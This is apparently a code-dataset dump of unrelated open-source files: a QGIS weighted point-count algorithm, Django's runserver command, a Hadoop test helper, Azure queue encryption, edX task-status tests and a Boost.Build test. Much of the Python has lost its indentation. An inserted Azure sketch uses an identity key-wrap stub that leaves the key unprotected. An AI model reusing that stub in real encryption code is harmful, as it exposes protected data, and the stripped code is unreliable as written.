from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class PointsInPolygonWeighted(GeoAlgorithm):
POLYGONS = 'POLYGONS'
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
FIELD = 'FIELD'
WEIGHT = 'WEIGHT'
# =========================================================================
# def getIcon(self):
# return QIcon(os.path.dirname(__file__) + "/icons/sum_points.png")
# =========================================================================
def defineCharacteristics(self):
        self.name, self.i18n_name = self.trAlgorithm('Count points in polygon (weighted)')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POLYGONS,
self.tr('Polygons'), [ParameterVector.VECTOR_TYPE_POLYGON]))
self.addParameter(ParameterVector(self.POINTS,
self.tr('Points'), [ParameterVector.VECTOR_TYPE_POINT]))
self.addParameter(ParameterTableField(self.WEIGHT,
self.tr('Weight field'), self.POINTS))
self.addParameter(ParameterString(self.FIELD,
self.tr('Count field name'), 'NUMPOINTS'))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Weighted count')))
def processAlgorithm(self, progress):
polyLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POLYGONS))
pointLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
fieldName = self.getParameterValue(self.FIELD)
fieldIdx = pointLayer.fieldNameIndex(self.getParameterValue(self.WEIGHT))
polyProvider = polyLayer.dataProvider()
fields = polyProvider.fields()
fields.append(QgsField(fieldName, QVariant.Int))
(idxCount, fieldList) = vector.findOrCreateField(polyLayer,
polyLayer.pendingFields(), fieldName)
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(
fields.toList(), polyProvider.geometryType(), polyProvider.crs())
spatialIndex = vector.spatialindex(pointLayer)
ftPoint = QgsFeature()
outFeat = QgsFeature()
geom = QgsGeometry()
current = 0
hasIntersections = False
features = vector.features(polyLayer)
total = 100.0 / float(len(features))
for ftPoly in features:
geom = ftPoly.geometry()
attrs = ftPoly.attributes()
count = 0
hasIntersections = False
points = spatialIndex.intersects(geom.boundingBox())
if len(points) > 0:
hasIntersections = True
if hasIntersections:
progress.setText(str(len(points)))
for i in points:
request = QgsFeatureRequest().setFilterFid(i)
ftPoint = pointLayer.getFeatures(request).next()
tmpGeom = QgsGeometry(ftPoint.geometry())
if geom.contains(tmpGeom):
weight = str(ftPoint.attributes()[fieldIdx])
try:
count += float(weight)
except:
# Ignore fields with non-numeric values
pass
outFeat.setGeometry(geom)
if idxCount == len(attrs):
attrs.append(count)
else:
attrs[idxCount] = count
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
current += 1
progress.setPercentage(int(current * total))
del writer
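# --- Illustrative sketch (editor's addition, not part of the algorithm) -----
# How such a GeoAlgorithm is typically invoked from the QGIS 2.x Python
# console. The algorithm id string and the layer paths are assumptions for
# demonstration only; check processing.alglist('weighted') for the exact id.
def _example_run_from_console():
    import processing  # only available inside a QGIS session
    return processing.runalg(
        'qgis:countpointsinpolygonweighted',   # assumed provider:algorithm id
        '/tmp/polygons.shp',                   # POLYGONS
        '/tmp/points.shp',                     # POINTS
        'population',                          # WEIGHT field on the points layer
        'NUMPOINTS',                           # FIELD: name of the new count field
        None)                                  # OUTPUT: let processing pick a temp file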
| gpl-2.0 |
xrg/django-static-gitified | django/core/management/commands/runserver.py | 77 | 5859 | from optparse import make_option
import os
import re
import sys
import socket
from django.core.management.base import BaseCommand, CommandError
from django.core.servers.basehttp import AdminMediaHandler, run, WSGIServerException, get_internal_wsgi_application
from django.utils import autoreload
naiveip_re = re.compile(r"""^(?:
(?P<addr>
(?P<ipv4>\d{1,3}(?:\.\d{1,3}){3}) | # IPv4 address
(?P<ipv6>\[[a-fA-F0-9:]+\]) | # IPv6 address
(?P<fqdn>[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*) # FQDN
):)?(?P<port>\d+)$""", re.X)
DEFAULT_PORT = "8000"
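# --- Illustrative sketch (editor's addition, not part of Django) ------------
# What naiveip_re accepts and which named groups handle() below relies on.
# Purely for demonstration; the sample values are arbitrary.
def _example_parse_addrport():
    samples = {
        '8000': (None, '8000'),                   # bare port
        '1.2.3.4:8000': ('1.2.3.4', '8000'),      # IPv4 address
        '[::1]:8000': ('[::1]', '8000'),          # IPv6 address (brackets kept, stripped later)
        'localhost:8000': ('localhost', '8000'),  # FQDN
    }
    for value, expected in samples.items():
        m = re.match(naiveip_re, value)
        assert (m.group('addr'), m.group('port')) == expected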
class BaseRunserverCommand(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use a IPv6 address.'),
make_option('--nothreading', action='store_false', dest='use_threading', default=True,
help='Tells Django to NOT use threading.'),
make_option('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.'),
)
help = "Starts a lightweight Web server for development."
args = '[optional port number, or ipaddr:port]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def get_handler(self, *args, **options):
"""
Returns the default WSGI handler for the runner.
"""
return get_internal_wsgi_application()
def handle(self, addrport='', *args, **options):
self.use_ipv6 = options.get('use_ipv6')
if self.use_ipv6 and not socket.has_ipv6:
raise CommandError('Your Python does not support IPv6.')
if args:
raise CommandError('Usage is runserver %s' % self.args)
self._raw_ipv6 = False
if not addrport:
self.addr = ''
self.port = DEFAULT_PORT
else:
m = re.match(naiveip_re, addrport)
if m is None:
raise CommandError('"%s" is not a valid port number '
'or address:port pair.' % addrport)
self.addr, _ipv4, _ipv6, _fqdn, self.port = m.groups()
if not self.port.isdigit():
raise CommandError("%r is not a valid port number." % self.port)
if self.addr:
if _ipv6:
self.addr = self.addr[1:-1]
self.use_ipv6 = True
self._raw_ipv6 = True
elif self.use_ipv6 and not _fqdn:
raise CommandError('"%s" is not a valid IPv6 address.' % self.addr)
if not self.addr:
self.addr = self.use_ipv6 and '::1' or '127.0.0.1'
self._raw_ipv6 = bool(self.use_ipv6)
self.run(*args, **options)
def run(self, *args, **options):
"""
Runs the server, using the autoreloader if needed
"""
use_reloader = options.get('use_reloader')
if use_reloader:
autoreload.main(self.inner_run, args, options)
else:
self.inner_run(*args, **options)
def inner_run(self, *args, **options):
from django.conf import settings
from django.utils import translation
threading = options.get('use_threading')
shutdown_message = options.get('shutdown_message', '')
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
self.stdout.write("Validating models...\n\n")
self.validate(display_num_errors=True)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Development server is running at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": self._raw_ipv6 and '[%s]' % self.addr or self.addr,
"port": self.port,
"quit_command": quit_command,
})
# django.core.management.base forces the locale to en-us. We should
# set it up correctly for the first request (particularly important
# in the "--noreload" case).
translation.activate(settings.LANGUAGE_CODE)
try:
handler = self.get_handler(*args, **options)
run(self.addr, int(self.port), handler,
ipv6=self.use_ipv6, threading=threading)
except WSGIServerException, e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
13: "You don't have permission to access that port.",
98: "That port is already in use.",
99: "That IP address can't be assigned-to.",
}
try:
error_text = ERRORS[e.args[0].args[0]]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write("%s\n" % shutdown_message)
sys.exit(0)
class Command(BaseRunserverCommand):
option_list = BaseRunserverCommand.option_list + (
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.'),
)
def get_handler(self, *args, **options):
"""
Serves admin media like old-school (deprecation pending).
"""
handler = super(Command, self).get_handler(*args, **options)
return AdminMediaHandler(handler, options.get('admin_media_path'))
| bsd-3-clause |
dongpf/hadoop-0.19.1 | src/contrib/hod/testing/helper.py | 182 | 1122 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import sys
sampleText = "Hello World!"
if __name__=="__main__":
args = sys.argv[1:]
if args[0] == "1":
    # print sample text to stdout
sys.stdout.write(sampleText)
elif args[0] == "2":
# print sample text to stderr
sys.stderr.write(sampleText)
# Add any other helper programs here, with different values for args[0]
pass
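# --- Illustrative sketch (editor's addition) --------------------------------
# A test can run this helper in a subprocess and assert on which stream
# receives sampleText. The helper path below is an assumed location.
def _example_run_helper(helper_path="src/contrib/hod/testing/helper.py"):
  import subprocess
  proc = subprocess.Popen([sys.executable, helper_path, "1"],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  out, err = proc.communicate()
  # For argument "1" the text goes to stdout; for "2" it goes to stderr.
  return out, err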
| apache-2.0 |
dstrockis/outlook-autocategories | lib/azure/storage/queue/_encryption.py | 1 | 7544 | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure.common import (
AzureException,
)
from .._constants import (
_ENCRYPTION_PROTOCOL_V1,
)
from .._encryption import (
_generate_encryption_data_dict,
_dict_to_encryption_data,
_generate_AES_CBC_cipher,
_validate_and_unwrap_cek,
_EncryptionAlgorithm,
)
from json import (
dumps,
loads,
)
from base64 import(
b64encode,
b64decode,
)
from .._error import(
_ERROR_UNSUPPORTED_ENCRYPTION_VERSION,
_ERROR_DECRYPTION_FAILURE,
_ERROR_DATA_NOT_ENCRYPTED,
_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM,
_validate_not_none,
_validate_key_encryption_key_wrap,
_validate_key_encryption_key_unwrap,
_validate_encryption_protocol_version,
_validate_kek_id,
)
from .._common_conversion import (
_encode_base64,
_decode_base64_to_bytes
)
from cryptography.hazmat.primitives.padding import PKCS7
import os
def _encrypt_queue_message(message, key_encryption_key):
'''
Encrypts the given plain text message using AES256 in CBC mode with 128 bit padding.
Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek).
Returns a json-formatted string containing the encrypted message and the encryption metadata.
:param object message:
        The plain text message to be encrypted.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
get_kid()--returns a string key id for this key-encryption-key.
:return: A json-formatted string containing the encrypted message and the encryption metadata.
:rtype: str
'''
_validate_not_none('message', message)
_validate_not_none('key_encryption_key', key_encryption_key)
_validate_key_encryption_key_wrap(key_encryption_key)
# AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks
content_encryption_key = os.urandom(32)
initialization_vector = os.urandom(16)
# Queue encoding functions all return unicode strings, and encryption should
# operate on binary strings.
message = message.encode('utf-8')
cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector)
# PKCS7 with 16 byte blocks ensures compatibility with AES.
padder = PKCS7(128).padder()
padded_data = padder.update(message) + padder.finalize()
# Encrypt the data.
encryptor = cipher.encryptor()
encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
# Build the dictionary structure.
queue_message = {}
queue_message['EncryptedMessageContents'] = _encode_base64(encrypted_data)
queue_message['EncryptionData'] = _generate_encryption_data_dict(key_encryption_key,
content_encryption_key,
initialization_vector)
return dumps(queue_message)
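# --- Illustrative sketch (editor's addition, not part of the library) -------
# The key-encryption-key (kek) argument above is defined only by its required
# methods, so this stub shows the minimal shape such an object can take. The
# identity "wrap", the algorithm label and the kid string are assumptions for
# demonstration only; a real kek would wrap the CEK with e.g. RSA-OAEP or a
# key-vault call.
class _ExampleKeyWrapper(object):
    def wrap_key(self, key):
        # Identity wrap, purely for illustration -- never do this in production.
        return key
    def unwrap_key(self, key, algorithm):
        # Mirror of wrap_key; a real implementation would honour `algorithm`.
        return key
    def get_key_wrap_algorithm(self):
        return 'none-illustrative'
    def get_kid(self):
        return 'local:example-kek'
def _example_encrypt_message(message=u'hello queue'):
    # Encrypt a plain-text queue message with the stub kek defined above.
    return _encrypt_queue_message(message, _ExampleKeyWrapper())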
def _decrypt_queue_message(message, require_encryption, key_encryption_key, resolver):
'''
Returns the decrypted message contents from an EncryptedQueueMessage.
If no encryption metadata is present, will return the unaltered message.
:param str message:
The JSON formatted QueueEncryptedMessage contents with all associated metadata.
:param bool require_encryption:
If set, will enforce that the retrieved messages are encrypted and decrypt them.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The plain text message from the queue message.
:rtype: str
'''
try:
message = loads(message)
encryption_data = _dict_to_encryption_data(message['EncryptionData'])
decoded_data = _decode_base64_to_bytes(message['EncryptedMessageContents'])
except (KeyError, ValueError) as e:
# Message was not json formatted and so was not encrypted
# or the user provided a json formatted message.
if require_encryption:
            # Use the constant imported above so the error message resolves correctly.
            raise ValueError(_ERROR_DATA_NOT_ENCRYPTED)
else:
return message
try:
return _decrypt(decoded_data, encryption_data, key_encryption_key, resolver).decode('utf-8')
except Exception as e:
raise AzureException(_ERROR_DECRYPTION_FAILURE)
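# --- Illustrative sketch (editor's addition, not part of the library) -------
# Round trip for the stub above: decrypt either with the same kek object or
# with a resolver that maps the stored kid back to a kek. The resolver shown
# here is an assumption for demonstration only.
def _example_decrypt_message(encrypted_message):
    kek = _ExampleKeyWrapper()
    def resolver(kid):
        # A real resolver would look the key up in a vault or key store.
        return kek if kid == kek.get_kid() else None
    # Passing either key_encryption_key or resolver is sufficient; both shown.
    return _decrypt_queue_message(
        encrypted_message, require_encryption=True,
        key_encryption_key=kek, resolver=resolver)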
def _decrypt(message, encryption_data, key_encryption_key=None, resolver=None):
'''
Decrypts the given ciphertext using AES256 in CBC mode with 128 bit padding.
    Unwraps the content-encryption-key using the user-provided or resolved key-encryption-key (kek). Returns the original plaintext.
:param str message:
The ciphertext to be decrypted.
:param _EncryptionData encryption_data:
The metadata associated with this ciphertext.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The decrypted plaintext.
:rtype: str
'''
_validate_not_none('message', message)
content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, resolver)
if not ( _EncryptionAlgorithm.AES_CBC_256 == encryption_data.encryption_agent.encryption_algorithm):
raise ValueError(_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM)
cipher = _generate_AES_CBC_cipher(content_encryption_key, encryption_data.content_encryption_IV)
#decrypt data
decrypted_data = message
decryptor = cipher.decryptor()
decrypted_data = (decryptor.update(decrypted_data) + decryptor.finalize())
#unpad data
unpadder = PKCS7(128).unpadder()
decrypted_data = (unpadder.update(decrypted_data) + unpadder.finalize())
    return decrypted_data
 | apache-2.0 |
olexiim/edx-platform | lms/djangoapps/instructor_task/tests/test_views.py | 204 | 17817 |
"""
Test for LMS instructor background task views.
"""
import json
from celery.states import SUCCESS, FAILURE, REVOKED, PENDING
from mock import Mock, patch
from django.utils.datastructures import MultiValueDict
from instructor_task.models import PROGRESS
from instructor_task.tests.test_base import (InstructorTaskTestCase,
TEST_FAILURE_MESSAGE,
TEST_FAILURE_EXCEPTION)
from instructor_task.views import instructor_task_status, get_task_completion_info
class InstructorTaskReportTest(InstructorTaskTestCase):
"""
Tests view methods that involve the reporting of status for background tasks.
"""
def _get_instructor_task_status(self, task_id):
"""Returns status corresponding to task_id via api method."""
request = Mock()
request.REQUEST = {'task_id': task_id}
return instructor_task_status(request)
def test_instructor_task_status(self):
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
def test_missing_instructor_task_status(self):
task_id = "missing_id"
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output, {})
def test_instructor_task_status_list(self):
# Fetch status for existing tasks by arg list, as if called from ajax.
# Note that ajax does something funny with the marshalling of
# list data, so the key value has "[]" appended to it.
task_ids = [(self._create_failure_entry()).task_id for _ in range(1, 5)]
request = Mock()
request.REQUEST = MultiValueDict({'task_ids[]': task_ids})
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(len(output), len(task_ids))
for task_id in task_ids:
self.assertEquals(output[task_id]['task_id'], task_id)
def test_get_status_from_failure(self):
# get status for a task that has already failed
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], TEST_FAILURE_MESSAGE)
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': TEST_FAILURE_EXCEPTION,
'message': TEST_FAILURE_MESSAGE,
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_success(self):
# get status for a task that has already succeeded
instructor_task = self._create_success_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'total': 5,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_legacy_success(self):
# get status for a task that had already succeeded, back at a time
# when 'updated' was used instead of the preferred 'succeeded'.
legacy_progress = {
'attempted': 3,
'updated': 2,
'total': 5,
'action_name': 'rescored',
}
instructor_task = self._create_entry(task_state=SUCCESS, task_output=legacy_progress)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
self.assertEquals(output['task_progress'], legacy_progress)
def _create_email_subtask_entry(self, total=5, attempted=3, succeeded=2, skipped=0, task_state=PROGRESS):
"""Create an InstructorTask with subtask defined and email argument."""
progress = {'attempted': attempted,
'succeeded': succeeded,
'skipped': skipped,
'total': total,
'action_name': 'emailed',
}
instructor_task = self._create_entry(task_state=task_state, task_output=progress)
instructor_task.subtasks = {}
instructor_task.task_input = json.dumps({'email_id': 134})
instructor_task.save()
return instructor_task
def test_get_status_from_subtasks(self):
# get status for a task that is in progress, with updates
# from subtasks.
instructor_task = self._create_email_subtask_entry(skipped=1)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Progress: emailed 2 of 3 so far (skipping 1) (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'skipped': 1,
'total': 5,
'action_name': 'emailed',
}
self.assertEquals(output['task_progress'], expected_progress)
def _test_get_status_from_result(self, task_id, mock_result=None):
"""
Provides mock result to caller of instructor_task_status, and returns resulting output.
"""
with patch('celery.result.AsyncResult.__new__') as mock_result_ctor:
mock_result_ctor.return_value = mock_result
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
return output
def test_get_status_to_pending(self):
# get status for a task that hasn't begun to run yet
instructor_task = self._create_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PENDING
output = self._test_get_status_from_result(task_id, mock_result)
for key in ['message', 'succeeded', 'task_progress']:
self.assertTrue(key not in output)
self.assertEquals(output['task_state'], 'PENDING')
self.assertTrue(output['in_progress'])
def test_update_progress_to_progress(self):
# view task entry for task in progress
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PROGRESS
mock_result.result = {
'attempted': 5,
'succeeded': 4,
'total': 10,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Progress: rescored 4 of 5 so far (out of 10)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
self.assertEquals(output['task_progress'], mock_result.result)
def test_update_progress_to_failure(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = FAILURE
mock_result.result = NotImplementedError("This task later failed.")
mock_result.traceback = "random traceback"
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "This task later failed.")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': 'NotImplementedError',
'message': "This task later failed.",
'traceback': "random traceback",
}
self.assertEquals(output['task_progress'], expected_progress)
def test_update_progress_to_revoked(self):
        # view task entry for a task in progress that is later revoked
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = REVOKED
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Task revoked before running")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], REVOKED)
self.assertFalse(output['in_progress'])
expected_progress = {'message': "Task revoked before running"}
self.assertEquals(output['task_progress'], expected_progress)
def _get_output_for_task_success(self, attempted, succeeded, total, student=None):
"""returns the task_id and the result returned by instructor_task_status()."""
# view task entry for task in progress
instructor_task = self._create_progress_entry(student)
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = SUCCESS
mock_result.result = {
'attempted': attempted,
'succeeded': succeeded,
'total': total,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
return output
def _get_email_output_for_task_success(self, attempted, succeeded, total, skipped=0):
"""returns the result returned by instructor_task_status()."""
instructor_task = self._create_email_subtask_entry(
total=total,
attempted=attempted,
succeeded=succeeded,
skipped=skipped,
task_state=SUCCESS,
)
return self._test_get_status_from_result(instructor_task.task_id)
def test_update_progress_to_success(self):
output = self._get_output_for_task_success(10, 8, 10)
self.assertEquals(output['message'], "Problem rescored for 8 of 10 students")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 10,
'succeeded': 8,
'total': 10,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_success_messages(self):
output = self._get_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any students with submissions to be rescored (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Problem failed to be rescored for any of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 9 students (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Problem successfully rescored for 10 students")
self.assertTrue(output['succeeded'])
output = self._get_output_for_task_success(0, 0, 1, student=self.student)
self.assertTrue("Unable to find submission to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 0, 1, student=self.student)
self.assertTrue("Problem failed to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 1, 1, student=self.student)
self.assertTrue("Problem successfully rescored for student" in output['message'])
self.assertTrue(output['succeeded'])
def test_email_success_messages(self):
output = self._get_email_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients ")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients")
self.assertTrue(output['succeeded'])
output = self._get_email_output_for_task_success(0, 0, 10, skipped=3)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10, skipped=3)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10, skipped=3)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients (skipping 3)")
self.assertTrue(output['succeeded'])
def test_get_info_for_queuing_task(self):
# get status for a task that is still running:
instructor_task = self._create_entry()
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_missing_output(self):
# check for missing task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = None
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_broken_output(self):
# check for non-JSON task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No parsable status information available")
def test_get_info_for_empty_output(self):
# check for JSON task_output with missing keys
instructor_task = self._create_success_entry()
instructor_task.task_output = "{}"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No progress status information available")
def test_get_info_for_broken_input(self):
# check for non-JSON task_input, but then just ignore it
instructor_task = self._create_success_entry()
instructor_task.task_input = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "Status: rescored 2 of 3 (out of 5)")
| agpl-3.0 |
yxcoin/yxcoin | src/boost_1_55_0/tools/build/v2/test/library_chain.py | 44 | 3427 | #!/usr/bin/python
# Copyright 2003, 2004, 2005, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test that a chain of libraries works ok, no matter if we use static or shared
# linking.
import BoostBuild
import os
import string
t = BoostBuild.Tester(use_test_config=False)
# Stage the binary, so that it will be relinked without hardcode-dll-paths.
# That will check that we pass correct -rpath-link, even if not passing -rpath.
t.write("jamfile.jam", """\
stage dist : main ;
exe main : main.cpp b ;
""")
t.write("main.cpp", """\
void foo();
int main() { foo(); }
""")
t.write("jamroot.jam", "")
t.write("a/a.cpp", """\
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
gee() {}
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
geek() {}
""")
t.write("a/jamfile.jam", "lib a : a.cpp ;")
t.write("b/b.cpp", """\
void geek();
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
foo() { geek(); }
""")
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a ;")
t.run_build_system(["-d2"], stderr=None)
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Check that <library> works for static linking.
t.write("b/jamfile.jam", "lib b : b.cpp : <library>../a//a ;")
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
